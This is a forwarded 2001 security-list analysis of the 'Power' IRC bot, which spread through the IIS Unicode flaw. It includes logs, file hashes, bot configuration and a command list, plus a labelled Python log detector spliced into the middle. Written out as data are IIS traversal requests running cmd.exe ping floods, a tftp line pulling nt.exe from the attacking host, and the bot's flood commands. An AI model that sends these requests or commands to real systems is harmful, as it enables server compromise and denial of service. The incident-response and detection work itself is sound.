---------- Forwarded message ----------
Date: Wed, 8 Aug 2001 12:41:55 -0700 (PDT)
Subject: "Power" bot (was Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool)
From: Dave Dittrich <dittrichat_private>
To: Ryan Russell <ryanat_private>
Cc: Eyes to the Skies. <sgtphou@fire-eyes.yi.org>, "intrusionsat_private" <intrusionsat_private>, "INCIDENTSat_private" <INCIDENTSat_private>

> On Tue, 7 Aug 2001, Eyes to the Skies. wrote:
>
> > This looks like an attempt to use a CodeRed II infected system to
> > perform a denial of service attack. I don't think I need to stress the
> > severity of this.
> >
> > ==> /var/log/apache/access_log <==
> > [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET
> > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted
> > target ip]+"-n"+7000+"-w"+0" 404 -
>
> Nothing to do with code red, or it would be root.exe, or
> /c/winnt/system32/cmd.exe.

I believe Ryan is correct that this is not CodeRed (or CodeRed II, or
Son-of-teenage-mutant-ninja-Red...)

Rather, it looks to me like this is the "Power" bot (CERT Advisory 2001-20
called it a worm, though I don't believe it shows worm properties, when
actually it just combines distributed DoS, scanning, and port redirection
in a single tool that uses IRC for its control channel.) The CERT Advisory
from July 20 can be found at:

http://www.cert.org/advisories/CA-2001-20.html

Below is an edited version of an analysis of "Power" bot. Best (although
hasty) efforts were made to sanitize it.

Reports of UDP "probes" from suspected CodeRed infected machines may also
be Power, but mis-categorized due to insufficient data. Compare running
processes and files on the system with information in this report. If
you see evidence of this on your systems or networks, report this to
CERT and NIPC.
(Please note differences in MD5 hashes of files when reporting to help
CERT/NIPC/whoever track variants and/or confirm what is actually on the
system. Seems like there are four or five different malware programs
floating around Windows NT/2000/IIS systems, and more confusion than
necessary about what is what. Details *do* matter.)

------------------------------------------------------------------------

[Note that output of the "ngrep" program is showing "2001/06/XX" instead
of "2001/07/XX", e.g.:

T 2001/06/03 18:07:28.124220 10.1.0.10:6667 -> 192.168.9.171:2334 [AP]
:XXXX!~XXXXat_private PRIVMSG #XXXX :PASS: Password accepted; you are now
registered with this service..

This may be a bug. No time has been spent trying to fix it, but conversion
of time stamps shown by "tcpdump" shows the log files have the correct
times.]

Executive summary
-----------------

The following is a report of distributed scanning, distributed denial of
service (DDoS), and distributed IRC port redirection, surrounding a custom
script add-on to the mirc32.exe client for Windows. This activity is
associated with Windows 2000 and Windows NT systems, and is currently
relying on the Unicode vulnerability in Microsoft's IIS server on these
platforms.

Over 40 systems at one site were affected, and several were used
concurrently for denial of service attacks and distributed scanning from
July 2 through July 9. This site has received over 100 reports during this
period. The distributed scanning is known to have attempted the
IIS/Unicode exploit against more than 300,000 systems, and netted close to
10,000 vulnerable systems between July 6 and July 8, 2001.

The attackers are actively using this network for IRC "war" activity. At
this time, there is no known motive for more widespread attacks, but the
intruders are actively upgrading the software package in an attempt to
automate the addition of compromised hosts to the DDoS network, which would
result in a fully integrated scan/exploit/attack network.
(Limits in the ability to use IRC as a means of command and control may
limit the potential size of this network, but even with the hosts they now
control they are causing a significant amount of network disruption and
hundreds of abuse reports to those sites whose systems are being used for
scanning.)

Time line and details
---------------------

On July 1, 2001, XXXX reported detection of an attempted probe of his web
server:

--------------------------------------------------------------------------
[07/01/2001 00:04:43.602 GMT-0700] Connection: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (XX.XX.XXX.XXX) on port 80 (tcp).
[07/01/2001 00:04:43.922 GMT-0700] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
--------------------------------------------------------------------------

This shows an attempted exploit of the Windows IIS Unicode vulnerability,
most recently made famous on May 8, 2001, in CERT Advisory 2001-11 as a
feature of the Linux sadmind-IIS worm:

http://www.cert.org/advisories/CA-2001-11.html

At 15:05 on July 3, XXXXXX noticed abnormally high traffic rates on the
XXXXXXXXXXX/24 subnet:

Shortly after this, XXXXX analyzed the router's flow cache and noted the
following flows to/from the host XXXXXXXXXXXX (protocol 1 is ICMP):

SrcIPaddress     DstIPaddress     Pr SrcP DstP  Pkts  B/Pk
209.212.108.28   XXXXXXXXXXXX     01 0000 0000  5496  1500
209.212.108.28   XXXXXXXXXXXX     01 0000 0800   561  1500
200.214.117.61   XXXXXXXXXXXX     01 0000 0800    66  1500
XXXXXXXXXXXX     209.212.108.28   01 0000 0B01    33    56
XXXXXXXXXXXX     200.214.117.61   01 0000 0B01     2    56
XXXXXXXXXXXX     130.161.218.234  01 0000 0000  7245  1475
130.161.218.234  XXXXXXXXXXXX     01 0000 0000   39K  1475  530.4
130.161.218.234  XXXXXXXXXXXX     01 0000 0800   893  1500
196.12.33.105    XXXXXXXXXXXX     01 0000 0000   30K  1498  1323.3

XXXX noted that, as XXXXXX had observed, the attack appeared to have
stopped.
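An added detection example for the kind of log line shown above (my code, not part of Dittrich's report or of the Power bot analysis): it pulls IIS Unicode traversal requests out of web server logs, decodes the overlong escapes the way unpatched IIS did, and labels whether the attacker ran a "dir" probe, a tftp upload or a ping.exe flood through cmd.exe, the three forms that appear in this report. The %c0%af form is an assumption taken from the general description of the bug rather than something seen here, and the sample lines are constructed from ones quoted in this report.

```python
"""Flag IIS "Unicode" directory-traversal requests in web server logs.

Added example, not part of the original report. It looks for the
request shape this report keeps meeting, /scripts/..%c1%9c../winnt/
system32/cmd.exe?/c+COMMAND, canonicalises the overlong UTF-8 escapes
the way unpatched IIS did, and labels what was run through cmd.exe so
a "dir" probe, a tftp tool upload and a ping.exe flood launch show up
as different events.
"""
import re
from urllib.parse import unquote_to_bytes

# Overlong two-byte UTF-8 sequences that unpatched IIS decoded to path
# separators after its traversal check had run.  %c1%9c is the form seen
# in this report; %c0%af is the other commonly documented one (assumption).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

PATH_RE = re.compile(r"(/scripts/\S*?cmd\.exe)")
# "cmd.exe?/c+..." in a raw request line, or "cmd.exe /c+..." in an IIS W3C
# log where stem and query are separate fields; the command runs up to a
# trailing HTTP status code or the end of the line.
CMD_RE = re.compile(r'cmd\.exe[?\s]/c\+?(?P<cmd>.*?)(?:"?\s+\d{3}(?:\s|$)|\s*$)')
# Client address: first field (Apache CLF) or after date/time (IIS W3C)
CLIENT_RE = re.compile(r"^(?:\d{4}-\d\d-\d\d \d\d:\d\d:\d\d )?(\d{1,3}(?:\.\d{1,3}){3})")


def canonicalise(path):
    """Percent-decode, then fold overlong escapes to the separators IIS used."""
    raw = unquote_to_bytes(path)
    for seq, sep in OVERLONG.items():
        raw = raw.replace(seq, sep)
    return raw.decode("latin-1")


def is_traversal(path):
    """True when the decoded path still steps out of /scripts with ..\\ or ../"""
    return re.search(r"\.\.[\\/]", canonicalise(path)) is not None


def classify(command):
    """Name the attacker's intent from the program run through cmd.exe."""
    tool = command.split()[0].lower().rsplit(".", 1)[0] if command.split() else ""
    return {"dir": "recon probe", "tftp": "tool upload",
            "ping": "flood launch"}.get(tool, "other command")


def analyse_line(line):
    """Return a finding dict for a traversal + cmd.exe request, else None."""
    m_path, m_cmd = PATH_RE.search(line), CMD_RE.search(line)
    if not (m_path and m_cmd) or not is_traversal(m_path.group(1)):
        return None
    # '+' is the URL form of a space; the arguments are wrapped in quotes
    command = canonicalise(m_cmd.group("cmd")).replace("+", " ").replace('"', "").strip()
    m_client = CLIENT_RE.match(line)
    return {"client": m_client.group(1) if m_client else None,
            "command": command, "kind": classify(command)}


def analyse_log(lines):
    return [f for f in (analyse_line(l) for l in lines) if f]


# Sample lines constructed from the ones quoted in this report (sanitised
# values such as "[deleted host]" kept as they appear there)
SAMPLE_LOG = [
    '[deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted target ip]+"-n"+7000+"-w"+0" 404 -',
    "[07/01/2001 00:04:43.922 GMT-0700] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    '2001-07-02 21:39:14 10.1.1.1 - 192.168.14.197 80 GET /scripts/..\\../winnt/system32/cmd.exe /c+tftp.exe+"-i"+10.1.1.1+GET+nt.exe 502 -',
    '192.168.1.180 - - [06/Jul/2001:03:08:15 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"',
    '10.9.9.9 - - [06/Jul/2001:03:09:00 -0600] "GET /index.html HTTP/1.0" 200 1234',  # benign
]

if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(finding)
```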
XXXXX initiated network traffic monitoring to/from this system and noted
the following (output of "ngrep" program shown here):

--------------------------------------------------------------------------
T 10.1.0.10:6667 -> XXXXXXXXXXXX:4321 [AP]
:blyeuhisdalg!~yxccqtdbciwyat_private JOIN :#XXXX..:tsorbmpybher!~
voqteovzeijy@XXXXXXXXXXXXX JOIN :#XXXX..:ifwufklkxvrn!~tyyaxtpiybwh@XX
XXXXXXXXXXX JOIN :#XXXX..:xcvzlgiwcyqw!~yjcefcwnoler@XXXXXXXXXXXX JOIN
:#XXXX..:cehhaftlgppn!~skfutrulflcp@XXXXXXXXXXXXX JOIN :#XXXX..:stfet
nzamgbm!~accjbzpgfcww@XXXXXXXXXXXX JOIN :#XXXX..:gwypgjbdbely!~actybok
ttocq@XXXXXXXXXXXX JOIN :#XXXX..:zijlrondxqhb!~eoeelcwewsbs@XXXXXXXXXX
XXX JOIN :#XXXX..:dyyyrpyannjh!~foyazmdppwyx@XXXXXXXXXXXXX JOIN :#XXXX
..:wmvcxcwsgypu!~fhkgogxuwcwa@XXXXXXXXXXXXXX JOIN :#XXXX..:rewgeayxjyv
e!~wmqrpzihhrpp@XXXXXXXXXXXXXX JOIN :#XXXX..:kfukbsyoxacl!~qkpttdwhhba
d@XXXXXXXXXXXXX JOIN :#XXXX..:jgmkjdbvlrpy!~sprbfnzguzwc@XXXXXXXXXXXXX
JOIN :#XXXX..:swbbqdjyviql!~imufldgcgcbt@XXXXXXXXXXXX JOIN :#XXXX..
--------------------------------------------------------------------------

He followed this IRC traffic to other hosts and observed the following:

--------------------------------------------------------------------------
T 2001/06/03 18:07:28.124220 10.1.0.10:6667 -> XXXXXXXXXXXXX:2334 [AP]
:XXXX!~XXXX@XXXXXXXXXXXX PRIVMSG #XXXX :PASS: Password accepted; you are
now registered with this service..

T 2001/06/03 18:07:28.625205 10.1.0.10:6667 -> XXXXXXXXXXXXX:2334 [AP]
:XXXX!~XXXX@XXXXXXXXXXXX PRIVMSG #XXXX :BNC.START: BNC started o
n port 111 [ /server XX.XXX.XXX.XX 111 ]..
--------------------------------------------------------------------------

Based on investigation, XXXXX was able to identify 9 hosts that were likely
compromised. XXXXX had observed IRC traffic associated with these hosts.
XXXXX reported that the only IRC nick observed using XXXXXXXXXXXXXXXX
systems that isn't a random string of characters is "XXXXXXXXXXXXX", and
it looks like she and her bots hang out in the channel #XXXXX:

--------------------------------------------------------------------------
T 10.0.0.1:6667 -> XXXXXXXXXXXX:4315 [AP]
:XXXXXXXXXXX!~XXXXXXat_private PRIVMSG #XXXXX :!rbots join #XXXX..
--------------------------------------------------------------------------

(enter all of his bots into #XXXX)

XXXXX observed the nick "XXXXXX" immediately grant operator privileges to
all of the bots, so it is assumed this is either also a bot, or he/she is
probably involved as well.

XXXXX made an nmap scan of the above listed suspect systems. Common to
many was a profile like the following, which shows Windows 2000 as the
operating system, and at least two unusual listening ports:

--------------------------------------------------------------------------
Starting nmap V. 2.53 by fyodorat_private ( www.insecure.org/nmap/)
Interesting ports on XXXXXXXXXXXX (192.168.1.225):
(The 65522 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
80/tcp     open        http
100/tcp    open        newacct
135/tcp    open        loc-srv
139/tcp    open        netbios-ssn
443/tcp    open        https
445/tcp    open        microsoft-ds
1025/tcp   open        listen
1026/tcp   open        nterm
4836/tcp   open        unknown
12624/tcp  open        unknown

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=17052 (Worthy challenge)
Remote operating system guess: Windows 2000 RC1 through final release
--------------------------------------------------------------------------

A connection to the 12624/tcp port elicits a "Password:" prompt.

(A capture of all network traffic to/from several hosts was initiated on
July 3.)

On July 3, notice was sent to all the registered subnet contacts for the
known hosts, noting the suspected intrusions and the known ports 100/tcp
and 12624/tcp.
One administrator who received this message reported that he had analyzed
his system (a Win2k/IIS test system) using Foundstone's "fport" program,
found on this page:

http://www.foundstone.com/rdlabs/tools.php?category=Forensic

It showed the following:

--------------------------------------------------------------------------
FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid   Process            Port  Proto Path
884   inetinfo       ->  21    TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
884   inetinfo       ->  25    TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
884   inetinfo       ->  80    TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
1400  winnt          ->  100   TCP   C:\winnt.exe
444   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
884   inetinfo       ->  443   TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
8     System         ->  445   TCP
736   MSTask         ->  1044  TCP   C:\WINNT\system32\MSTask.exe
884   inetinfo       ->  1052  TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
660   sqlservr       ->  1056  TCP   C:\MSSQL7\binn\sqlservr.exe
8     System         ->  1067  TCP
660   sqlservr       ->  1433  TCP   C:\MSSQL7\binn\sqlservr.exe
1400  winnt          ->  2350  TCP   C:\winnt.exe
1400  winnt          ->  2351  TCP   C:\winnt.exe
1400  winnt          ->  2352  TCP   C:\winnt.exe
1400  winnt          ->  2353  TCP   C:\winnt.exe
[hundreds of lines removed . . .]
1400  winnt          ->  2646  TCP   C:\winnt.exe
1400  winnt          ->  2647  TCP   C:\winnt.exe
1400  winnt          ->  2648  TCP   C:\winnt.exe
772   termsrv        ->  3389  TCP   C:\WINNT\System32\termsrv.exe
884   inetinfo       ->  4700  TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
1152  nt             ->  4836  TCP   c:\inetpub\scripts\nt.exe
1152  nt             ->  12624 TCP   c:\inetpub\scripts\nt.exe
444   svchost        ->  135   UDP   C:\WINNT\system32\svchost.exe
8     System         ->  445   UDP
260   lsass          ->  1027  UDP   C:\WINNT\system32\lsass.exe
220   winlogon       ->  1046  UDP   \??\C:\WINNT\system32\winlogon.exe
248   services       ->  1051  UDP   C:\WINNT\system32\services.exe
884   inetinfo       ->  1064  UDP   C:\WINNT\System32\inetsrv\inetinfo.exe
564   llssrv         ->  1087  UDP   C:\WINNT\System32\llssrv.exe
464   spoolsv        ->  1217  UDP   C:\WINNT\system32\spoolsv.exe
884   inetinfo       ->  3456  UDP   C:\WINNT\System32\inetsrv\inetinfo.exe
1152  nt             ->  12623 UDP   c:\inetpub\scripts\nt.exe
--------------------------------------------------------------------------

Listening on 100/tcp and 12624/tcp is the same program,
"c:\inetpub\scripts\nt.exe". (It is unclear what the 300 ports listed for
"C:\winnt.exe" are all about.)

On July 5, XXXX notes more IRC traffic that has been logged, showing the
bot network being used to initiate DDoS attacks:

--------------------------------------------------------------------------
T 2001/06/05 09:46:03.354884 10.0.0.1:6667 -> 192.168.1.153:1423 [AP]
:XXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!udp 209.253.49.243 99999999..

T 2001/06/05 09:56:40.777333 10.0.0.1:6667 -> 192.168.1.143:4513 [AP]
:XXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!hudp..

T 2001/06/05 10:26:32.567410 10.0.0.1:6667 -> 192.168.1.102:2827 [AP]
:XXXX!~XXXXXXat_private QUIT :upset/depressed/pissed off/hu
rt..

T 2001/06/05 10:26:32.561551 10.0.0.1:6667 -> 192.168.1.180:2380 [AP]
:XXXX!~XXXXXXat_private QUIT :upset/depressed/pissed off/hu
rt..

T 2001/06/05 10:40:45.555193 10.0.0.1:6667 -> 192.168.1.164:2567 [AP]
:XXXXX!~XXXXXXat_private JOIN :#XXXX..
T 2001/06/05 09:19:36.061139 10.0.0.1:6667 -> 192.168.14.46:4447 [AP]
:XXXX!~XXXXXXat_private PRIVMSG #XXXX :!udp 24.76.35.83 10
000..

T 2001/06/05 09:29:30.138876 10.0.0.1:6667 -> 192.168.16.108:3645 [AP]
:XXXXX!~XXXXXat_private JOIN :#XXXX..
--------------------------------------------------------------------------

The victim of this attack is:

A030-0751.HSTN.splitrock.net: Internet address = 209.253.49.243

[whois.arin.net]
SplitRock Services, Inc (NETBLK-SPLITROCK98)
   8665 New Trails Drive
   The Woodlands, TX 77381
   US

   Netname: SPLITROCK98
   Netblock: 209.252.0.0 - 209.255.255.255
   Maintainer: SPLT

   Coordinator:
      Splitrock Services, Inc (IS1-ARIN) netadminat_private
      281.465.1200

(See also files "remote.ini" and "mirc.ini")

On July 6, two incident handlers examined a suspect Windows 2000 system.
Using Foundstone's "afind" and "fport" forensic tools for Windows it was
confirmed that "nt.exe" was installed on this system July 1 19:39 PDT. (It
was found that C:\winnt.exe could not be zipped directly, but could be
copied to D:\ where it was then possible to zip it into an archive.)

The following files were found and retrieved for analysis and reverse
engineering (MD5 hashes shown for comparison):

00b41a87e536de8908af134692ceadf6  hexplore.exe
00f8ba83759e9257603d4203b0561715  mirc.ini
87f4355b0a59a7e87250ff4925dc75b8  nt.exe
6d3ee930a216483ea2dd5860ea7d44f0  nt.INI
748cbd596f1956858f27f88731000644  remote.ini
7644ae3bcadae89e7160e3aff2e7d2bc  root.exe
5cbbd44be7359be787765abf7c90644b  winnt.exe
0a1295be3a0fb615e7dfb88b9a3abb20  win98.ava
dc5a3f43491d8309f1742acec7668698  wins.ava

These files were located in the C:\Inetpub\scripts, C:\, and C:\i386
directories. (The same system showed an earlier exploitation by the
sadmind-IIS worm, which left the files default.asp, default.htm,
index.asp, and index.htm. Also found was root.exe, which may have been
from yet another prior compromise.)

 Volume in drive C has no label.
 Volume Serial Number is 401B-321D

 Directory of c:\Inetpub\scripts

07/01/01  19:31        <DIR>          .
07/01/01  19:31        <DIR>          ..
06/13/01  09:19                   289 default.asp
06/13/01  09:19                   289 default.htm
06/13/01  09:19                   289 index.asp
06/13/01  09:19                   289 index.htm
07/01/01  19:30               161,280 nt.exe
07/01/01  19:31                    23 nt.INI
11/18/99  12:04               208,144 root.exe
               9 File(s)        370,603 bytes
                             37,631,488 bytes free

It is not clear what role the nt.INI file plays, but the contents are
shown here (two versions from two different sources are shown):

% xxd nt.INI
0000000: bdb0 a8b3 baad 0d0a cfdc c0d2 decb cb0d  ................
0000010: 0a0d 0a0d 0a0d 0a                        .......

% xxd ../nt.INI
0000000: bdb0 a8b3 baad 0d0a dad1 cbd6 decb 0d0a  ................
0000010: 0d0a 0d0a 0d0a                           ......

The program appears to work in this way:

1). The attacker exploits the Unicode vulnerability in Microsoft IIS to
run a command. This command uses the trivial file transfer protocol to
upload a file from the attacking host:

--------------------------------------------------------------------------
2001-07-02 21:39:14 10.1.1.1 - 192.168.14.197 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp.exe+"-i"+10.1.1.1+GET+nt.exe 502 -
--------------------------------------------------------------------------

(It is assumed the same method is used to then run the program, although
this has not been confirmed from system logs. The above is all that was
provided.)

2). The "nt.exe" program appears to be compressed. When run, it is assumed
it uncompresses itself, creates(?) a file nt.INI (role not determined
yet) and configures the system to restart itself at each reboot. It
listens on port 12624 for commands to upload files. (It is not yet clear
precisely how this upload protocol works, but it has been observed to
upload files on port 4836/tcp as shown below.)

3). After nt.exe is set up, a series of programs are loaded, including:

    winnt.exe     Renamed(?) mirc32.exe binary
    mirc.ini      mirc32 config file
    hexplore.exe  Rootkit style process hider?
    remote.ini    Configuration file for bot
    wins.ava      Code for BNC/Scan/DDoS program
    win98.ava     Code for BNC/Scan/DDoS program

These files have been found in C:\Inetpub\scripts, C:\, and/or C:\i386.

4). Periodically, new updates of the program are uploaded from other
sites. (This program appears to be in active development by XXXXX and
XXXXXXX.)

The following is the (edited) contents of "remote.ini", a list of
variables for the bot, which shows these nicks and other specifics of the
bot:

--------------------------------------------------------------------------
[variables]
n0=%access XXXXX XXXXX XXXXXXX XXXX
n1=%scan.ip 24.189.31.*
n2=%scan.port 27374
n3=%scan.inc 191
n4=%r 858921703669
n5=%scan.range 24.189.31.190
n6=%auto #XXXX
n7=%masterpass 12345
n8=%key password
n9=%pass power
n10=%mass.server dysfunction-1.mine.nu
n11=%mass.port 6667
n12=%mass.bots 5
n13=%mass.inc 5
n14=%user qmlhzqztcjqh
n15=%split.server 192.168.10.10
n16=%split.port 6667
n17=%split.chans #XXXX,#XXXXXX,#XXXX
n18=%bnc power
n19=%udp.times 99999
n20=%udp.chan #XXXX
n21=%dos.ip 209.245.102.72
n22=%dos.times 50
n23=%bup 15
n24=%bnc.port 100
n25=%bnc.status On
n26=%scan.p 27374
n27=%sscan On
n28=%scan.info SubSeven Protection: http://come.to/sub7-protection/
n29=%found.upload server removed. closing...
n30=%progress 8
n31=%uploading found
n32=%localfile c:\windows\winserver.exe
n33=%remotefile c:\windows\winserver.exe
n34=%upload.tot 382371
n35=%channel #XXXX
n36=%prefix 24
--------------------------------------------------------------------------

Commands supported by the server version analyzed on July 7, 2001.
Command options are shown in lower case, with user specific variable
arguments shown in ALL CAPS (see "wins.ava" for source to these commands):

--------------------------------------------------------------------------
!info               Show info about system running bot, for example:

  :XXXXX!~XXXXXXat_private PRIVMSG #XXXX :!info
  PRIVMSG #XXXX :[Windows 2000][1wk 3days 6hrs 25mins 12secs][192.168.1.153][Powe
  r1.0]
  :Power[9738712607]!~Powerat_private PRIVMSG #XXXX :[Windows NT][2wks 6days
  22hrs 6mins 3secs][217.34.102.68][Power1.0]
  :Power[2558484581]!~Powerat_private PRIVMSG #XXXX :[Windows 2000][2wks 1day
  15hrs 52mins 4secs][217.34.44.16][Power1.0]
  :Power[6813557052]!~Powerat_private PRIVMSG #XXXX :[Windows 2000][1wk 2days
  8hrs 44mins 53secs][192.168.1.213][Power1.0]
  :Power[2916020276]!~Powerat_private PRIVMSG #XXXX :[Windows NT][1wk 6days 1
  5hrs 27mins 33secs][192.168.13.60][Power1.0]
  :Power[4053275324]!~Powerat_private PRIVMSG #XXXX :[Windows 2000][1wk 2days
  8hrs 44mins 1sec][192.168.1.171][Power1.0]
  :Power[4205594385]!~Powerat_private PRIVMSG #XXXX :[Windows 2000][2wks 6day
  s 2hrs 15mins 51secs][192.168.1.180][Power1.0]
  . . .

!add NICK           Allows access to specified nick

!remove NICK        Removes access to specified nick

!access             ???

!pass PASSWORD      Sets new password

!login PASSWORD     Logs user in, if the password is correct (this
                    password is in clear text.)

!massbots SERVER PORT BOTS
                    (Not sure how this works, but probably tells bots
                    which IRC server to use; not sure what the # at end
                    is for yet.)

!rbots #CHAN        Register(?) bots in channel "#CHAN".

!cbots              Closes socket for "*Power*" (kills bots?)

!udp IP TIMES       Floods victim ip address "IP" with large UDP packets

!hudp IP
!hudp all           Halt UDP flood on specific IP, or all hosts being
                    flooded

!udplist            Prints list of ips being flooded.
!dos IP TIMES       This command exploits a feature of Microsoft Windows
                    2000 ping.exe, which allows one to set the protocol
                    type to IGMP or IGRP for packets sent, using the
                    following flags:

                    ping -v igrp -t -l 5000 %dos.ip -n %dos.times -w 0
                    ping -v igmp -t -l 5000 %dos.ip -n %dos.times -w 0

!bnc on             Enable BNC port redirection on preset port (100 is
                    being used currently on those bots observed.)

!bnc off            Disable BNC port redirection.

!bnc port PORT      Set port for BNC to listen on to "PORT".

!bnc pass BNC       ???

!bnc reset          Closes and reopens socket.

!bnc status         Report status of BNC and explain how to connect to it.

!scan status        Report status of scanning (IP and port.)

!scan off           Stop scanning.

!scan prefix PREFIX Start scanning IP netblock with prefix PREFIX on
                    predefined port.

!scan on            Start scanning on IP netblock defined by the first
                    octet of the predefined prefix, the second octet
                    randomized from 0..220, the third octet randomized
                    from 0..255, and the fourth octet being anything.
                    The port to be scanned is assumed to have been set
                    earlier. Lastly, it reports scanning status.

!scan port PORT     Sets the port to be scanned and reports status.

!raw command [args...]
                    (Not quite sure how this works.)

!/clear             (Unknown how this works)

!host list          If user's nick is in a special access list, list the
                    number of lines in the file "webservers.txt" (must be
                    a list of bots).

!host send          Sends a copy of "webservers.txt" via DCC.

!packet IP PACKETS  Flood address IP with PACKETS packets from each of a
                    set of web servers listed in a file "webservers.txt".
                    These are Windows IIS servers with the Unicode
                    vulnerability. It sends each one a web request:

                    GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c ping.exe -v igmp -t -l 30000 IP -n PACKETS -w 10

                    Reports "Packeting IP with # Packets and N hosts"
                    (where "N" is the number of lines in "webservers.txt")

!socks              Reports "Sockets Opened During Last Packet: N" where
                    N is a variable %sockets.
!rbots COMMAND      Not sure what this is, but here it is in use:

  T 2001/06/06 02:37:25.209849 10.0.0.1:6667 -> 192.168.1.153:3145 [AP]
  :XXXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!rbots privmsg dos[12] :this
  annoying!..
  . . .
  T 2001/06/06 02:38:02.828723 10.0.0.1:6667 -> 192.168.1.153:3145 [AP]
  :XXXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!rbots notice dos[12] :this
  annoying!..
--------------------------------------------------------------------------

Examples of commands:

--------------------------------------------------------------------------
T 2001/06/06 00:38:22.697747 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:XXXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!udp 216.198.75.194 99999..

T 2001/06/06 00:38:23.106934 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:Power[2558484581]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.1
98.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[973871260
7]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Time
s: 99999][Halt: !hudp 216.198.75.194]..:Power[8935450546]!~Powerat_private
4.104.98 PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt:
!hudp 216.198.75.194]..:Power[9201287277]!~Powerat_private PRIVMS
G #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.198.
75.194]..:Power[8536771384]!~Powerat_private PRIVMSG #XXXX :[UDP]
[IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power
[6035234664]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75
.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[2916020276]!~P
owerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99
999][Halt: !hudp 216.198.75.194]..:Power[2905936848]!~Powerat_private
.12 PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hud
p 216.198.75.194]..:Power[5499856258]!~Powerat_private PRIVMSG #po
wer :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.198.75.19
4]..:Power[4053275324]!~Powerat_private PRIVMSG #XXXX :[UDP][IP:
216.198.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[6731
664986]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194]
[Times: 99999][Halt: !hudp 216.198.75.194]..:Power[3834129955]!~Power@
217.34.95.185 PRIVMSG #XXXX :[UDP][IP: 216.19..............

T 2001/06/06 00:38:23.106934 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
s: 99999][Halt: !hudp 216.198.75.194]..

T 2001/06/06 00:38:23.490730 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:Power[2236262189]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.
198.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[87055102
95]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Tim
es: 99999][Halt: !hudp 216.198.75.194]..:Power[6941998911]!~Power@217.
34.194.193 PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Hal
t: !hudp 216.198.75.194]..:Power[9080084936]!~Powerat_private PRIV
MSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.19
8.75.194]..
T 2001/06/06 00:38:29.706665 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:Power[3408730344]!~Powerat_private PRIVMSG #XXXX :All UDP Halted.
.

T 2001/06/06 00:38:30.278941 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:Power[3408730344]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.1
98.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..

T 2001/06/06 00:38:19.943790 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:XXXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!hudp all..

T 2001/06/06 00:38:20.328563 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:Power[9738712607]!~Powerat_private PRIVMSG #XXXX :All UDP Halted
..:Power[2558484581]!~Powerat_private PRIVMSG #XXXX :All UDP Halte
d..:Power[8935450546]!~Powerat_private PRIVMSG #XXXX :All UDP Hal
ted..:Power[2916020276]!~Powerat_private PRIVMSG #XXXX :All UDP H
alted..

T 2001/06/06 00:38:20.869588 10.0.0.1:6667 -> 192.168.1.213:3891 [AP]
:Power[3834129955]!~Powerat_private PRIVMSG #XXXX :All UDP Halted
..:Power[6035234664]!~Powerat_private PRIVMSG #XXXX :All UDP Halt
ed..:Power[2905936848]!~Powerat_private PRIVMSG #XXXX :All UDP Ha
lted..:Power[5499856258]!~Powerat_private PRIVMSG #XXXX :All UDP
